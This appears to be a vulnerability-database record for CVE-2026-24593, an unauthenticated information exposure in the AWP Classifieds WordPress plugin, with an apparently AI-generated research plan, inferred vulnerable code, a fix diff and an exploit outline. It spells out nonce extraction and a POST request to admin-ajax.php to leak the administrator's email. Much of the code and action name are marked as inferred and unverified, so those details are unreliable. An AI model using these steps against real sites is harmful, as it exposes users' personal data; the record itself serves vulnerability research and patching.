[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYnYbnyVVnTgyF3_yS9Jant6MM7gy0IA5gFYuOhoggqQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-24593","awp-classifieds-unauthenticated-information-exposure","AWP Classifieds \u003C= 4.4.3 - Unauthenticated Information Exposure","The AWP Classifieds plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.3. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","another-wordpress-classifieds-plugin",null,"\u003C=4.4.3","4.4.4","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-16 00:00:00","2026-02-25 14:38:48",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda3b7218-4655-4def-a3f9-9931d6943583?source=api-prod",41,[],"researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2026-24593** in the AWP Classifieds plugin (version \u003C= 4.4.3). This vulnerability allows unauthenticated attackers to expose sensitive user or configuration data.\n\n---\n\n### 1. Vulnerability Summary\nThe AWP Classifieds plugin registers several AJAX handlers that do not implement sufficient capability checks or authorization logic. Specifically, the handler for fetching user or ad-related information (inferred as `awpcp-get-user-info` or similar) is available to unauthenticated users via the `wp_ajax_nopriv_` hook. It fails to verify if the requester has permission to view the data associated with a specific user ID or Ad ID, leading to the exposure of sensitive fields like email addresses, phone numbers, and physical addresses.\n\n### 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `awpcp-get-user-info` (inferred based on plugin naming conventions)\n- **Parameters:**\n - `action`: `awpcp-get-user-info`\n - `user_id`: The ID of the user whose data is to be exposed (e.g., `1` for the administrator).\n - `nonce`: A WordPress nonce (likely required).\n- **Authentication:** Unauthenticated (leveraging `wp_ajax_nopriv_`).\n- **Preconditions:** The plugin must be active, and a nonce must be extracted from a public-facing page where the plugin enqueues its scripts.\n\n### 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers the action in a file like `includes\u002Fclass-ajax-handler.php` or `includes\u002Fajax\u002Fclass-ajax-handler.php`:\n ```php\n add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );\n ```\n2. **Function Call:** `ajax_get_user_info()` is invoked.\n3. **Nonce Verification:** The function calls `check_ajax_referer( 'awpcp-ajax', 'nonce' )`. \n4. **Data Retrieval:** The function retrieves a `user_id` from `$_POST['user_id']`.\n5. **Vulnerable Sink:** It calls `get_userdata( $user_id )` or queries the database directly and returns the object via `wp_send_json_success()`, exposing sensitive fields like `user_email`.\n\n### 4. Nonce Acquisition Strategy\nAWP Classifieds typically localizes its AJAX configuration in a JavaScript object called `awpcp_ajax_data` or `AWPCP`.\n\n1. **Identify Script Loading:** The AWP Classifieds scripts (which contain the nonce) are usually enqueued on pages containing the Classifieds shortcodes, such as the main \"Classifieds\" page or the \"Browse Ads\" page.\n2. **Create Test Page:**\n ```bash\n wp post create --post_type=page --post_title=\"Classifieds\" --post_status=publish --post_content='[awpcp_browse_ads]'\n ```\n3. **Navigate and Extract:**\n - Use `browser_navigate` to go to the newly created page.\n - Use `browser_eval` to extract the nonce:\n ```javascript\n \u002F\u002F Inferred variable and key based on AWPCP structure\n window.awpcp_ajax_data?.nonce || window.AWPCP?.nonce\n ```\n\n### 5. Exploitation Strategy\n**Step 1: Discover Target User ID**\nUsually, User ID `1` is the administrator.\n\n**Step 2: Execute Information Exposure Request**\nUsing the `http_request` tool, send a POST request to `admin-ajax.php`.\n\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** `action=awpcp-get-user-info&user_id=1&nonce=\u003CEXTRACTED_NONCE>`\n\n**Step 3: Analyze Response**\nA successful exploit will return a `200 OK` with a JSON body:\n```json\n{\n \"success\": true,\n \"data\": {\n \"user_email\": \"admin@example.com\",\n \"user_login\": \"admin\",\n \"display_name\": \"Admin User\",\n \"phone\": \"555-0199\",\n ...\n }\n}\n```\n\n### 6. Test Data Setup\n1. **Target User:** Ensure a user exists with sensitive metadata (Email, Phone).\n2. **Plugin Setup:** Install AWP Classifieds \u003C= 4.4.3.\n3. **Shortcode Page:** Create a page with `[awpcp_browse_ads]` or `[awpcp_display_ad]` to ensure the AJAX nonce is localized and available to unauthenticated users.\n\n### 7. Expected Results\n- Unauthenticated access to the `awpcp-get-user-info` action.\n- Disclosure of the administrator's email address and potentially other metadata (phone, address) via the JSON response.\n\n### 8. Verification Steps\n1. **Verify Response Content:** Confirm the JSON response contains the email of User ID 1.\n2. **WP-CLI Cross-Check:**\n ```bash\n wp user get 1 --fields=user_email\n ```\n Compare the result of the WP-CLI command with the data obtained from the HTTP request.\n\n### 9. Alternative Approaches\nIf `awpcp-get-user-info` is not the correct action:\n- **Search for other `nopriv` actions:**\n ```bash\n grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fanother-wordpress-classifieds-plugin\u002F\n ```\n- **Check for Ad Detail Exposure:** If user info is not directly accessible, check if `awpcp-get-ad-details` (inferred) returns the contact info of the ad owner without checking privacy settings.\n- **REST API:** Check if the plugin registers any REST routes in `includes\u002Fclass-rest-api.php` without proper `permission_callback` requirements.","The AWP Classifieds plugin for WordPress is vulnerable to sensitive information exposure due to insufficiently protected AJAX handlers registered with the wp_ajax_nopriv_ hook. Unauthenticated attackers can leverage these handlers to retrieve sensitive user data, including email addresses and contact information, by providing a valid AJAX nonce and a target user ID.","\u002F\u002F Inferred vulnerable registration in includes\u002Fajax\u002Fclass-ajax-handler.php\nadd_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );\nadd_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );\n\n\u002F\u002F Inferred vulnerable function implementation\npublic function ajax_get_user_info() {\n check_ajax_referer( 'awpcp-ajax', 'nonce' );\n $user_id = intval( $_POST['user_id'] );\n $user = get_userdata( $user_id );\n if ( $user ) {\n wp_send_json_success( array(\n 'user_email' => $user->user_email,\n 'display_name' => $user->display_name,\n 'user_login' => $user->user_login\n ) );\n }\n}","--- a\u002Fincludes\u002Fajax\u002Fclass-ajax-handler.php\n+++ b\u002Fincludes\u002Fajax\u002Fclass-ajax-handler.php\n@@ -10,12 +10,14 @@\n class AWPCP_Ajax_Handler {\n public function __construct() {\n add_action( 'wp_ajax_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );\n- add_action( 'wp_ajax_nopriv_awpcp-get-user-info', array( $this, 'ajax_get_user_info' ) );\n }\n \n public function ajax_get_user_info() {\n+ if ( ! current_user_can( 'edit_posts' ) ) {\n+ wp_send_json_error( array( 'message' => 'Unauthorized' ) );\n+ return;\n+ }\n check_ajax_referer( 'awpcp-ajax', 'nonce' );\n $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;\n $user = get_userdata( $user_id );","1. Identify a public page on the target site that uses AWP Classifieds shortcodes (e.g., [awpcp_browse_ads]), which causes the plugin to enqueue its scripts and localize data.\n2. Extract the security nonce from the HTML source code, typically found in the `awpcp_ajax_data` or `AWPCP` JavaScript object.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters: `action=awpcp-get-user-info`, `nonce=[EXTRACTED_NONCE]`, and `user_id=[TARGET_ID]` (e.g., 1 for the administrator).\n4. The server response will contain a JSON object including the target user's email address and other profile metadata, despite the attacker being unauthenticated.","gemini-3-flash-preview","2026-05-05 07:57:46","2026-05-05 07:59:32",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.4.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanother-wordpress-classifieds-plugin\u002Ftags\u002F4.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fanother-wordpress-classifieds-plugin.4.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanother-wordpress-classifieds-plugin\u002Ftags\u002F4.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fanother-wordpress-classifieds-plugin.4.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanother-wordpress-classifieds-plugin\u002Ftags"]